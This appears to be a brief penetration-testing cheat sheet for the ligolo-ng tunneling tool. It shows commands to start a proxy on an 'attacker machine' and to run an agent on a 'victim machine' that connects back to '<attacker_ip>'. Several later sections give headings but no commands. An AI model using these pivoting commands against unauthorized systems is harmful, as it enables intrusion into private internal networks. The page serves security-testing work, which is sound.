Lingolo-ng
Basic Configuration
Create a connection
Proxy machine
Start the Lingolo proxy with a self-signed certificate on attacker machine with root privileges.
sudo proxy --selfcertAgent machine
Run the agent on the victim machine to connect to the Lingolo proxy.
./agent.exe --connect <attacker_ip>:<proxy_port> --ignore-certNetwork Configuration
After the agent successfully connects, select the session.
sessionStart the network interface
Create a network interface on the proxy's machine.
tunnel_start --tun ligoloAdd a new routing
List available interfaces on the agent.
Add a route to the internal interface.
Port Forward Listeners
Add a Listener.
List Active Listeners.
Stop a Listener.
Delete interface
list interfaces
Delete interface
Last updated